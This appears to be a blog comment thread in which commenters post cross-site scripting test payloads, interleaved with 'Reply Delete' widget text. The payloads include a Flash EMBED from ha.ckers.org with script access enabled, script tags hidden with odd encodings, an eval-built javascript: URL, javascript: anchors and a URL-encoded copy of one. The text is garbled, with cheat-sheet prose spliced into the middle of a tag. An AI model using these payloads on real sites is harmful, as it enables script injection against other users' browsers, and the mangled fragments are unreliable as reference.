EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: org/xss.swf" AllowScriptAccess="always">
test
ReplyDelete/>test
ReplyDelete< IMG src=x >
ReplyDelete'';!--"=&{()}
ReplyDeletetest bgsound
ReplyDelete
ReplyDelete
ReplyDeletept>
ReplyDeletept>
ReplyDeleteript>lol2
ReplyDelete¼script¾alert(6)¼/script¾
ReplyDeletetest7
ReplyDeleteEMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
ReplyDeleteorg/xss.swf" AllowScriptAccess="always">
a="get";
ReplyDeleteb="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
>
ReplyDeletealert("XSS")'); ?>
Deletelol7
ReplyDelete<A HREF="javascript:alert(1)">lol9</A>
ReplyDelete%3C%41%20%48%52%45%46%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%61%6C%65%72%74%28%31%29%22%3E%6C%6F%6C%39%3C%2F%41%3E
ReplyDeleteThis comment has been removed by the author.
ReplyDelete